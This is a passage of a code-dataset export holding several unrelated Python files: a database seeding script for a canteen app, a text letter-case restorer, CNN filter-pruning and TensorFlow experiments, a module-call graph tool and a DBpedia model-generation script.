json.load(f)\n\n for meal in meals:\n new_meal = Meal(title=meal.get('title'),\n description=meal.get('description'),\n category=meal.get('category'),\n day_linked=meal.get('day_linked'),\n source_price=meal.get('source_price'),\n price=meal.get('price'),\n enabled=meal.get('enabled'),\n timestamp_modified=datetime.datetime.utcnow())\n\n db_session.add(new_meal)\n print('Created meal:', new_meal)\n db_session.commit()\n\n\nclass PopulateUsers(Command):\n \"\"\"\n Creates fake users.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=20),\n )\n def __init__(self):\n pass\n\n def run(self, num):\n admin = User(real_name='Oleg',\n username='ollar',\n password='1',\n email='olegollar@gmail.com')\n db_session.add(admin)\n\n for i in range(num):\n with open('./words', 'r') as f:\n word = random.choice(f.read().splitlines())\n\n new_user = User(real_name=word,\n username=word,\n password=word,\n email=word+'@gmail.com')\n\n db_session.add(new_user)\n print('Created user:', new_user)\n db_session.commit()\n\n\n\nclass PopulateOrders(Command):\n \"\"\"\n Creates fake orders.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=200),\n )\n def __init__(self):\n self.users = db_session.query(User).all()\n self.meals = db_session.query(Meal).all()\n self.today = datetime.date.today()\n\n def _get_month_dates(self, num):\n for day in ((self.today + datetime.timedelta(14)) - datetime.timedelta(days=n) for n in range(num)):\n if day.weekday() in range(0,5):\n yield day\n\n\n def _get_day_meals(self, order_date):\n return [meal for 
meal in self.meals if meal.day_linked == order_date.weekday()]\n\n def run(self, num):\n for user in self.users:\n for date in self._get_month_dates(num):\n _meals = self._get_day_meals(date)\n\n for _m in _meals:\n new_order = Order(order_date=date,\n meal_id=_m.id,\n user_id=user.id,\n quantity=random.randint(1,10))\n\n db_session.add(new_order)\n print('Created orders for:', user)\n db_session.commit()\n print(\"Orders creation complete\")\n\n\nclass PopulateComments(Command):\n \"\"\"\n Creates fake comments.\n \"\"\"\n option_list = (\n Option('--number', '-n', dest='num', default=20),\n )\n def __init__(self):\n self.users = db_session.query(User).all()\n self.meals = db_session.query(Meal).all()\n self.today = datetime.date.today()\n\n def _compose_comment(self, num):\n text = []\n with open('./words', 'r') as f:\n word = f.read().splitlines()\n for i in range(num):\n text.append(random.choice(word))\n\n return ' '.join(text)\n\n def run(self, num):\n for user in self.users:\n for meal in self.meals:\n new_comment = Comment(meal_id=meal.id,\n user_id=user.id,\n content=self._compose_comment(num))\n\n db_session.add(new_comment)\n print('Created comments for:', user)\n db_session.commit()\n print(\"Comments creation complete\")\n\n\nmanager.add_command('hello', Hello)\nmanager.add_command('update_db', InitDB)\ntry:\n manager.add_command('popme', PopulateMeals)\n manager.add_command('popus', PopulateUsers)\n manager.add_command('popor', PopulateOrders)\n manager.add_command('popco', PopulateComments)\nexcept ProgrammingError:\n pass\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"canteen2/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47224653","text":"import os\nimport sys\nimport codecs\nimport difflib\n\nsys.path.insert(0, os.path.dirname(__file__))\n\nfrom logger import log\n\n\ndef restore_file_case(text_file, orig_file, debug=False):\n text_io = codecs.open(text_file, 'r', encoding='utf8')\n orig_io = codecs.open(orig_file, 'r', encoding='utf8')\n\n for line in text_io:\n orig_line = orig_io.next()\n result = restore_sentence_case(line.strip(), orig_line.strip(), debug)\n\n assert result.lower() == line.strip().lower(), \\\n \"Case restoration changed a sentence!\\n{}\\n{}\" \\\n .format(line.strip(), result)\n yield result.encode('utf8', 'replace')\n\n text_io.close()\n orig_io.close()\n\n\ndef restore_sentence_case(sent, orig_sent, debug=False):\n if debug and sent != orig_sent:\n log.debug(u'toks: {}'.format(sent).encode('utf8', 'replace'))\n log.debug(u'orig: {}'.format(orig_sent).encode('utf8', 'replace'))\n\n toks = sent.split()\n orig_toks = orig_sent.split()\n\n lc_toks = [tok.lower() for tok in toks]\n lc_orig_toks = [tok.lower() for tok in orig_toks]\n\n matcher = difflib.SequenceMatcher(None, lc_toks, lc_orig_toks)\n new_toks = []\n\n for tag, i1, i2, j1, j2 in matcher.get_opcodes():\n if debug and tag != 'equal' and sent != orig_sent:\n log.debug(u\" {}: ({},{}) '{}' -> ({},{}) '{}'\" \\\n .format(tag,\n i1, i2, ' '.join(toks[i1:i2]),\n j1, j2, ' '.join(orig_toks[j1:j2])) \\\n .encode('utf8', 'replace'))\n\n if tag == 'equal':\n new_toks += orig_toks[j1:j2]\n\n elif tag == 'replace':\n word = ' '.join(toks[i1:i2])\n orig_word = ' '.join(orig_toks[j1:j2])\n new_toks += [restore_word_case(word, orig_word)]\n\n elif tag == 'delete':\n if i1 == 0:\n tmp = toks[i1:i2]\n if is_capitalized(orig_toks[0]):\n orig_toks[0] = 
orig_toks[0].lower()\n tmp[0] = tmp[0].capitalize()\n elif is_uppercased(orig_toks[0]):\n tmp[0] = tmp[0].capitalize()\n new_toks += tmp\n else:\n new_toks += toks[i1:i2]\n\n elif tag == 'insert':\n if i1 == 0 and is_capitalized(orig_toks[j1]) and \\\n is_lowercased(orig_toks[j2]):\n orig_toks[j2] = orig_toks[j2].capitalize()\n\n new_sent = ' '.join(new_toks)\n\n if debug and sent != orig_sent:\n log.debug(\"sent: {}\".format(new_sent))\n\n return new_sent\n\n\ndef restore_word_case(tok, orig_tok):\n if tok.lower() == orig_tok.lower():\n return orig_tok\n\n if is_lowercased(orig_tok):\n return tok.lower()\n elif is_uppercased(orig_tok):\n return tok.upper()\n elif is_capitalized(orig_tok):\n return tok.capitalize()\n else:\n return tok\n\n\ndef is_lowercased(tok):\n return tok == tok.lower()\n\n\ndef is_uppercased(tok):\n return tok == tok.upper()\n\n\ndef is_capitalized(tok):\n return tok == tok.capitalize()\n","sub_path":"vwgec/utils/letter_case.py","file_name":"letter_case.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"390645946","text":"import torch\nimport train\nimport config as conf\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport math\nimport prune_and_train\nimport measure_flops\nimport evaluate\nimport numpy as np\nimport data_loader\nfrom sklearn import svm\nimport vgg\nimport predict_dead_filter\nfrom predict_dead_filter import fc\nimport prune\nimport generate_random_data\nimport resnet\n\ndef tmp(index_real,index):\n for i in range(len(index_real)):\n hit=0\n for ind in index_real[i]:\n if ind in index[i]:\n hit+=1\n print('in layer {}, number of true answer is {}. {} of total {} predictions are correct.'.format(i,len(index_real[i]),hit,len(index[i])))\n\ncheckpoint=torch.load('/home/victorfang/PycharmProjects/model_pytorch/baseline/vgg16_bn_cifar10,accuracy=0.941.tar')\nnet=checkpoint['net']\n\n\ndf_index,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=9000,use_random_data=False)\n\nconv_list,neural_list=evaluate.check_conv_alive_layerwise(net=net,neural_dead_times=800,batch_size=800)\ndf_index_random_data_conv,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,module_list=conv_list,neural_list=neural_list)\ntmp(df_index,df_index_random_data_conv)\n\nprint('--------------------------------------------')\n\nrelu_list,neural_list=evaluate.check_ReLU_alive(net=net,neural_dead_times=800,data=generate_random_data.random_normal(num=800,dataset_name='cifar10'))\ndf_index_random_data_relu,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,module_list=relu_list,neural_list=neural_list)\n\ntmp(df_index,df_index_random_data_relu)\n\n\n\nnum_conv = 0 # num of conv layers in the net\ndead_filter_index=list()\nfor mod in net.features:\n if isinstance(mod, torch.nn.modules.conv.Conv2d):\n num_conv += 1\nfor i in range(num_conv):\n df_index,_,_=evaluate.find_useless_filters_data_version(net=net,filter_dead_ratio=0.9,batch_size=800,neural_dead_times=800,use_random_data=True)\n dead_filter_index.append(df_index[i])\n net = prune.prune_conv_layer(model=net, layer_index=i + 1,\n filter_index=df_index[i]) # prune the dead filter\n\n\n\n\ndf_val, lf_val = predict_dead_filter.read_data(balance=True,\n 
path='/home/victorfang/Desktop/pytorch_model/vgg16bn_cifar10_dead_neural_normal_tar_acc_decent3/dead_neural',neural_dead_times=1200)\n\nstat_df_val = predict_dead_filter.statistics(df_val)\nstat_lf_val = predict_dead_filter.statistics(lf_val)\n\nval_x = np.vstack((stat_df_val, stat_lf_val))\nval_y = np.zeros(val_x.shape[0], dtype=np.int)\nval_y[:stat_df_val.shape[0]] = 1\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# validation data\nval_x_tensor = torch.tensor(val_x, dtype=torch.float32).to(device)\nval_y_tensor = torch.tensor(val_y, dtype=torch.long).to(device)\n\ncheckpoint=torch.load('/home/victorfang/Desktop/预测死亡神经元的神经网络/accuracy=0.72233.tar')\nnet=checkpoint['net']\nnet.load_state_dict(checkpoint['state_dict'])\noutput=net(val_x_tensor)\nprediction=torch.argmax(output,1)\ncorrect=(prediction==val_y_tensor).sum().float()\nacc=correct.cpu().detach().data.numpy()/val_y_tensor.shape[0]\nprint()\n\n# net = vgg.vgg16_bn(pretrained=False).to(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n# data_loader = data_loader.create_validation_loader(dataset_name='cifar10',default_image_size=32,\n# batch_size=72, mean=conf.cifar10['mean'], std=conf.cifar10['std'],\n# num_workers=conf.num_workers)\n# evaluate.evaluate_net(net=net, data_loader=data_loader, save_net=False)\n\n# net = vgg.vgg16_bn(pretrained=True)\n# net.classifier = nn.Sequential(\n# nn.Dropout(),\n# nn.Linear(512, 512),\n# nn.ReLU(True),\n# nn.Dropout(),\n# nn.Linear(512, 512),\n# nn.ReLU(True),\n# nn.Linear(512, 10),\n# )\n# for m in net.modules():\n# if isinstance(m, nn.Linear):\n# nn.init.normal_(m.weight, 0, 0.01)\n# nn.init.constant_(m.bias, 0)\n# net = net.to(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n#\n# # checkpoint = torch.load('/home/victorfang/Desktop/vgg16_bn_cifar10,accuracy=0.941.tar')\n# checkpoint = torch.load(\n# '/home/victorfang/Desktop/vgg16_bn_cifar10,accuracy=0.941.tar')\n#\n# net = checkpoint['net']\n# net.load_state_dict(checkpoint['state_dict'])\n# print(checkpoint['highest_accuracy'])\n# relu_list,neural_list=evaluate.check_ReLU_alive(net=net,\n# data_loader=data_loader.create_validation_loader(dataset_path=conf.cifar10['validation_set_path'],\n# default_image_size=32,\n# mean=conf.cifar10['mean'],\n# std=conf.cifar10['std'],\n# batch_size=1024,\n# num_workers=4,\n# dataset_name='cifar10',\n# ),\n# neural_dead_times=8000)\n\n\n\n\n\n\n\n\n\n\n# print(torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"))\n# checkpoint=torch.load('/home/victorfang/Desktop/vgg19_imagenet_deadReLU.tar')\n# relu_list=checkpoint['relu_list']\n# neural_list=checkpoint['neural_list']\n# net=checkpoint['net']\n#\n#\n# evaluate.plot_dead_filter_statistics(net,relu_list,neural_list,40000,1)\n# print()\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"644439382","text":"def explode(string):\n char_list = []\n for s in string:\n char_list += [s]\n \n return char_list\n\ndef get_string():\n string = input('Please enter a string: ')\n \n try:\n print(explode(string))\n except Exception as error:\n print('Error:', error)\n get_string()\n\nif __name__ == '__main__':\n get_string()\n","sub_path":"day04/explode.py","file_name":"explode.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387017415","text":"import 
os\r\nimport random\r\n\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom os import listdir\r\n\r\nimport sys\r\nimport re\r\n\r\ncurrent_file_name = sys.argv[0].split('/')[-1] #return current file name\r\n\r\n\"\"\"\r\n# ######## Historyjka 1. #########\r\ndef extract_filename(file): \r\n return file.split(\".\")[0] \r\n\r\n\r\ndef get_file_size(file_path): \r\n file_path = file_path if file_path.endswith('.py') else './'+file_path+'.py'\r\n return os.path.getsize(file_path)\r\n\r\ndef createGraph(path=\"./\"):\r\n g = nx.DiGraph() # create direct graph\r\n files_to_parse = list(filter(lambda f: f.endswith(\".py\"), listdir(path))) # only python files\r\n files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file. \r\n \r\n for file_path in files_to_parse:\r\n g.add_node(extract_filename(file_path)+str(get_file_size(file_path)))\r\n find_edges_in_file(file_path, g)\r\n return g\r\n\r\ndef count_calls(path, module_name): #zliczanie odwołań dla krawędzi\r\n pattern = re.compile(r'{}\\.'.format(module_name)) \r\n with open(path, 'r') as f: \r\n calls = re.findall(pattern, f.read()) \r\n return len(calls) \r\n \r\n\r\ndef find_edges_in_file(file, g): \r\n with open(file, 'r') as fr:\r\n for line in fr: #iteruje po liniach\r\n if (\"import\" in line):\r\n tab = line.split()\r\n print(tab)\r\n g.add_edge(\r\n extract_filename(file)+str(get_file_size(file)),\r\n tab[1]+str(get_file_size(tab[1])),\r\n weight=count_calls(file,tab[1])\r\n )\r\n \r\ndef drawGraph(graph): #Dominik\r\n edge_labels = nx.get_edge_attributes(g, \"weight\")\r\n pos = nx.spring_layout(g)\r\n nx.draw(graph, pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels)\r\n plt.show()\r\n\r\ng = createGraph()\r\ndrawGraph(g)\r\n\"\"\"\r\n\"\"\"\r\n# #### Historyjka nr2 ###########################\r\ndef rtrn_python_files(path): #zwraca listę plików .py \r\n return list(filter(lambda f: f.endswith(\".py\"), listdir(path)))\r\n\r\ndef drawGraph_func(graph): #Dominik\r\n edge_labels = nx.get_edge_attributes(g, \"weight\") \r\n #node_labels = nx.get_node_attributes(g, \"weight\") \r\n\r\n pos = nx.spring_layout(g) \r\n\r\n nx.draw(graph,pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels) \r\n\r\n plt.show() \r\n\r\ndef createGraphFunctions(path=\"./HIS_II/\"):\r\n g = nx.DiGraph() # create direct graph\r\n files_to_parse = rtrn_python_files(path)\r\n #files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file\r\n funkcje=[] #Tomek\r\n t_funkcje=[]\r\n #node'y\r\n for plik in files_to_parse:\r\n fs = get_function_names(path+\"/\"+plik)\r\n funkcje += fs\r\n t_funkcje = fs\r\n for name in t_funkcje:\r\n g.add_node(get_node_name(path+\"/\"+plik,name))\r\n\r\n #edge#\r\n for plik in files_to_parse: \r\n for name in funkcje:\r\n for othername in funkcje:\r\n if name == othername:\r\n continue\r\n methodCount = count_method(path+\"/\"+plik, name, othername) \r\n if (methodCount > 0):\r\n name = get_node_name(path+\"/\"+plik, name)\r\n othername = get_node_name(path+\"/\"+plik, othername)\r\n g.add_edge(name, othername, weight=methodCount)\r\n return g \r\n\r\ndef get_function_names(path): #function names from file. 
Tomek\r\n names = []\r\n with open(path, 'r') as fr:\r\n for line in fr:\r\n if re.match(r\"^\\s*?def\", line):\r\n n = line.split(\" \")[1].split(\"(\")[0] \r\n names.append(n)\r\n print(names)\r\n return names\r\n\r\ndef count_call_1(path, func_name): #Tomek\r\n pattern = re.compile(r'{}\\(\\)[^:]'.format(func_name))\r\n with open(path, 'r') as f:\r\n calls = re.findall(pattern, f.read())\r\n return len(calls)\r\n\r\ndef get_node_name(path, name): #Patryk\r\n return name+\" \"+str(count_call_1(path,name))\r\n\r\ndef count_method(path, names, othernames): #Dominik\r\n count = 0\r\n t = 0\r\n str = 'def ' + names\r\n f = open(path,\"r\")\r\n for x in f: #Tomek\r\n if t == 1:\r\n if 'def ' in x:\r\n t = 0\r\n f.close()\r\n return count\r\n if othernames in x:\r\n count=count+1\r\n elif str in x:\r\n t = 1\r\n f.close()\r\n return count \r\n\r\ng = createGraphFunctions() #Patryk\r\ndrawGraph_func(g)\r\n\"\"\"\r\n# #### Historyjka nr 3 ###########################\r\ndef rtrn_python_files(path): #zwraca listę plików .py\r\n return list(filter(lambda f: f.endswith(\".py\"), listdir(path))) \r\n\r\ndef drawGraph_func(graph):\r\n edge_labels = nx.get_edge_attributes(g, \"weight\") \r\n \r\n l = [] \r\n for u,v,d in g.edges(data=True): \r\n if \"weight\" not in d: \r\n l.append(((u,v), '')) \r\n else: \r\n l.append(((u,v), d['weight']))\r\n edge_labels = dict(l)\r\n \r\n pos = nx.spring_layout(g)\r\n\r\n nx.draw(graph,pos=pos, with_labels=True, font_weight='bold')\r\n nx.draw_networkx_edge_labels(g, pos=pos, edge_labels = edge_labels, label_pos=0.3)\r\n \r\n plt.show()\r\n \r\ndef count_call_1(path, func_name): #Tomek - zliczanie wywołań funckji\r\n pattern = re.compile(r'{}\\(\\)[^:]'.format(func_name))\r\n with open(path, 'r') as f:\r\n calls = re.findall(pattern, f.read())\r\n return len(calls)\r\n \r\ndef createGraphFunctions(path=\"./HIS_III/\"): #Wiktor, Kamil, Tomek\r\n\r\n g = nx.MultiDiGraph() # create multiDirected graph\r\n # files_to_parse = rtrn_python_files(path)\r\n #files_to_parse.pop(files_to_parse.index(current_file_name)) # without current file\r\n module_list = []\r\n for file_ in listdir(path):\r\n if os.path.isdir(path+\"/\"+file_): # sprawdzamy czy jest folderem\r\n if \"__init__.py\" in listdir(path+\"/\"+file_+\"/\"): # sprawdzamy czy jest modulem\r\n module_list.append(file_)\r\n \r\n print(module_list)\r\n for module in module_list:\r\n g.add_node(module) \r\n for file_ in listdir(path+\"/\"+module+\"/\"):\r\n for fun in get_function_names(path+\"/\"+module+\"/\"+file_):\r\n g.add_node(fun)\r\n g.add_edge(fun, module)\r\n \r\n for module_1 in module_list:\r\n for module_2 in module_list:\r\n if module_1 == module_2:\r\n continue\r\n count = 0\r\n for file_ in listdir(path+\"/\"+module_1+\"/\"):\r\n functions_in_module_1 = get_function_names(path+\"/\"+module_1+\"/\"+file_)\r\n for fun in functions_in_module_1:\r\n for plik in rtrn_python_files(path+module_2+\"/\"):\r\n count += count_call_1(path+\"/\"+module_2+\"/\"+plik, fun)\r\n g.add_edge(module_1, module_2, weight=count, label=module_1+module)\r\n return g\r\n \r\n\r\ndef get_function_names(path): #function names from file - Tomek\r\n names = []\r\n with open(path, 'r') as fr:\r\n for line in fr:\r\n if re.match(r\"^\\s*?def\", line):\r\n n = line.split(\" \")[1].split(\"(\")[0] \r\n names.append(n)\r\n print(names)\r\n return names \r\n\r\ng = createGraphFunctions() 
\r\ndrawGraph_func(g)\r\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"121224995","text":"\nimport argparse\nimport os\nimport sys\n\n##############################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=50)\nparser.add_argument('--batch_size', type=int, default=50)\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--lr', type=float, default=1e-3)\nparser.add_argument('--eps', type=float, default=1e-6)\nargs = parser.parse_args()\n\nif args.gpu >= 0:\n os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(args.gpu)\n\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom collections import deque\n\n(x_train, y_train), (_, _) = tf.keras.datasets.cifar10.load_data()\n\nassert(np.shape(x_train) == (50000, 32, 32, 3))\nx_train = x_train - np.mean(x_train, axis=0, keepdims=True)\nx_train = x_train / np.std(x_train, axis=0, keepdims=True)\ny_train = keras.utils.to_categorical(y_train, 10)\n\n####################################\n\nx = tf.placeholder(tf.float32, [None, 32 , 32 , 3])\ny = tf.placeholder(tf.float32, [None, 10])\nlr = tf.placeholder(tf.float32, ())\n\n####################################\n\nw = np.load('cifar10_weights.npy', allow_pickle=True).item()\nref_w1_init = w['conv1_weights'][:, :, :, 0:8]\nref_w2_init = w['conv2_weights'][:, :, 0:8, 0:16]\n\nref_w1 = tf.Variable(ref_w1_init, dtype=tf.float32)\nref_w2 = tf.Variable(ref_w2_init, dtype=tf.float32)\n\n####################################\n\nctrl_w1_init = np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=np.shape(ref_w1_init))\nctrl_w2_init = np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=np.shape(ref_w2_init))\n\nctrl_w1 = tf.Variable(ctrl_w1_init, dtype=tf.float32)\nctrl_w2 = tf.Variable(ctrl_w2_init, dtype=tf.float32)\n\n####################################\n\nw1p_init = np.absolute(np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=[3, 3, 3, 8]))\nw1n_init = np.absolute(np.random.normal(loc=np.average(ref_w1_init), scale=np.std(ref_w1_init), size=[3, 3, 3, 8]))\nw2p_init = np.absolute(np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=[3, 3, 8, 16]))\nw2n_init = np.absolute(np.random.normal(loc=np.average(ref_w2_init), scale=np.std(ref_w2_init), size=[3, 3, 8, 16]))\n\nw1p = tf.Variable(w1p_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw1n = tf.Variable(w1n_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw2p = tf.Variable(w2p_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\nw2n = tf.Variable(w2n_init, dtype=tf.float32, constraint=lambda x: tf.clip_by_value(x, 0, np.infty))\n\n####################################\n\n'''\ndef conv_op(x, f, szx, szf):\n \n num_batch = szx[0]\n num_patch = szx[1] * szx[2]\n h = szx[1]\n w = szx[2]\n \n dim_filter = szf[0] * szf[1] * szf[2]\n num_filter = szf[3]\n kh = szf[0]\n kw = szf[1]\n \n patches = tf.image.extract_image_patches(images=x, ksizes=[1, kh, kw, 1], strides=[1,1,1,1], padding='SAME', rates=[1,1,1,1]) # [50, 32, 32, 27]\n patches = tf.reshape(patches, (num_batch * num_patch, dim_filter)) # [50*32*32, 27]\n \n f = tf.reshape(f, [dim_filter, num_filter]) # [3, 3, 3, 32] -> [27, 32]\n \n conv = 
tf.matmul(patches, f) # [50*32*32, 27] @ [27, 32] -> [50*32*32, 27]\n conv = tf.reshape(conv, [num_batch, h, w, num_filter])\n \n return conv\n'''\n\n# '''\ndef conv_op(x, w, dc1, dc2):\n # x = tf.Print(x, [tf.shape(w)[0] * tf.shape(w)[1] * tf.shape(w)[2]], message='', summarize=1000)\n conv = tf.nn.conv2d(x, w, [1,1,1,1], 'SAME')\n conv = tf.nn.relu(conv)\n return conv\n# '''\n\n'''\ndef conv_op(x, f, szx, szf):\n \n num_batch = szx[0]\n num_patch = szx[1] * szx[2]\n h = szx[1]\n w = szx[2]\n \n dim_filter = szf[0] * szf[1] * szf[2]\n num_filter = szf[3]\n kh = szf[0]\n kw = szf[1]\n \n patches = tf.image.extract_image_patches(images=x, ksizes=[1, kh, kw, 1], strides=[1,1,1,1], padding='SAME', rates=[1,1,1,1]) # [50, 32, 32, 27]\n patches = tf.reshape(patches, (num_batch * num_patch, dim_filter)) # [50*32*32, 27]\n \n f = tf.reshape(f, [dim_filter, num_filter]) # [3, 3, 3, 32] -> [27, 32]\n \n conv = tf.matmul(patches, f) # [50*32*32, 27] @ [27, 32] -> [50*32*32, 27]\n conv = tf.reshape(conv, [num_batch, h, w, num_filter])\n \n return conv\n'''\n\ndef conv_op_np(x, wp, wn):\n convp = tf.nn.conv2d(x, wp, [1,1,1,1], 'SAME')\n convn = tf.nn.conv2d(x, wn, [1,1,1,1], 'SAME')\n \n # this is useless ... we need negative outputs.\n # conv = tf.nn.relu(convp - tf.nn.relu(convn))\n \n # and this is retarded, we would have another set of weights and activation ... would not just subtract these\n # conv = tf.nn.relu(convp) - tf.nn.relu(convn)\n \n conv = convp\n \n return conv\n\n####################################\n\nref_conv1 = conv_op(x, ref_w1, [50,32,32,3], [3,3,3,8])\nref_pool1 = tf.nn.avg_pool(ref_conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nref_conv2 = conv_op(ref_pool1, ref_w2, [50,16,16,8], [3,3,8,16])\nref_pool2 = tf.nn.avg_pool(ref_conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n####################################\n\nconv1 = conv_op_np(x, w1p, w1n)\npool1 = tf.nn.avg_pool(conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nconv2 = conv_op_np(pool1, w2p, w2n)\npool2 = tf.nn.avg_pool(conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nloss = tf.losses.mean_squared_error(labels=ref_pool2, predictions=pool2)\nparams = [w1p, w1n, w2p, w2n]\ngrads = tf.gradients(loss, params)\ngrads_and_vars = zip(grads, params)\ntrain = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars)\n\n####################################\n\nctrl_conv1 = conv_op(x, ctrl_w1, [50,32,32,3], [3,3,3,8])\nctrl_pool1 = tf.nn.avg_pool(ctrl_conv1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nctrl_conv2 = conv_op(ctrl_pool1, ctrl_w2, [50,16,16,8], [3,3,8,16])\nctrl_pool2 = tf.nn.avg_pool(ctrl_conv2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\nctrl_loss = tf.losses.mean_squared_error(labels=ref_pool2, predictions=ctrl_pool2)\nctrl_params = [ctrl_w1, ctrl_w2]\nctrl_grads = tf.gradients(ctrl_loss, ctrl_params)\nctrl_grads_and_vars = zip(ctrl_grads, ctrl_params)\nctrl_train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(ctrl_grads_and_vars)\n\n####################################\n\nsess = tf.InteractiveSession()\ntf.global_variables_initializer().run()\n\n####################################\n\nrandom_losses = []\nctrl_random_losses = []\n\nfor jj in range(0, 50000, args.batch_size):\n s = jj\n e = jj + args.batch_size\n xs = x_train[s:e]\n ys = y_train[s:e]\n \n [l, cl] = sess.run([loss, ctrl_loss], feed_dict={x: xs, y: ys, lr: 0.0})\n \n random_losses.append(l)\n 
ctrl_random_losses.append(cl)\n\n####################################\n\nfor ii in range(args.epochs):\n \n losses = []\n ctrl_losses = []\n \n for jj in range(0, 50000, args.batch_size):\n s = jj\n e = jj + args.batch_size\n xs = x_train[s:e]\n ys = y_train[s:e]\n \n [l, cl, _, _] = sess.run([loss, ctrl_loss, train, ctrl_train], feed_dict={x: xs, y: ys, lr: args.lr})\n \n losses.append(l)\n ctrl_losses.append(cl)\n \n print ('loss %f/%f | ctrl loss %f/%f' % (np.average(losses), np.average(random_losses), np.average(ctrl_losses), np.average(ctrl_random_losses)))\n \n####################################\n \n","sub_path":"neg_equiv/v3/t8.py","file_name":"t8.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108955077","text":"from classes.HierarchicalModelGeneration import HierarchicalModelGeneration\nfrom classes.SparseVector import SparseVector\nfrom classes.STIClassifier import STIClassifier\nfrom classes.ClassifierAggregator import ClassifierAggregator\nfrom classes.HiearchicalEvaluator import HiearchicalEvaluator\nfrom distutils.dir_util import copy_tree\nfrom importlib import reload\nimport lucene\nimport settings as s\nimport logging\nimport logging.config\nimport os\n\nfrom json import dumps as jdumps\nfrom json import load as jload\n\nfrom pprint import pprint\nfrom collections import defaultdict, Counter, OrderedDict\nfrom pathlib import Path\nlogging.config.fileConfig(fname='logger.conf', disable_existing_loggers=False)\n\nlogger = logging.getLogger(__name__)\n\nlucene.initVM()\n\n\ndef main():\n for a in os.scandir(Path(\"results/confs\")):\n if a.name == 'desktop.ini':\n continue\n for b in os.scandir(a):\n if b.name == 'desktop.ini':\n continue\n print(a.name)\n print(b.name)\n print(Path(b.path) / 'conf.json')\n\n with open(s.configFile, 'w') as w, open(Path(b.path) / 'conf.json', 'r') as r:\n w.write(r.read())\n reload(s)\n s.modelsDir = Path(b.path) / 'models'\n s.resultFile1 = Path(b.path) / 'results_gs1.nt'\n s.resultFile2 = Path(b.path) / 'results_gs2.nt'\n s.resultFile3 = Path(b.path) / 'results_gs3.nt'\n\n hierarchicalModelGeneration = HierarchicalModelGeneration(s.indexShorAbstracts, s.indexCathegories, s.indexInstaceTypes,\n s.indexLinks, s.indexCathegoriesMerged, s.indexLHD, str(s.dbpeadiaBase))\n if s.createOntology:\n hierarchicalModelGeneration.traverseClassesHierarchyStart(True, 0, s.dbpediaFullClassHiearchy)\n hierarchicalModelGeneration.traverseClassesHierarchyStart(True, s.minInstances, s.dbpediaExcerpt)\n hierarchicalModelGeneration.adjustOntology(s.dbpediaExcerpt, s.minSubClasses)\n else:\n logger.info('Skipping onotlogy creation phase')\n\n ModelTemplates = hierarchicalModelGeneration.createModelTemplate(s.dbpediaExcerptCleaned)\n masterTermVectorsWithPos = {}\n if s.train:\n vectors = {base.name: [] for base in s.experimentBase}\n for i, modelTemplate in enumerate(ModelTemplates, 0):\n modelTemplate.pickRandomArticless(s.minInstances)\n modelTemplate.convertToBoa()\n for base in s.experimentBase:\n vector = modelTemplate.initClassTermVector(True, base)\n vectors[base.name].append(vector)\n logger.debug(f\"{base.name} - lenght {len(vector)}\")\n\n masterTermVectors = {base.name: 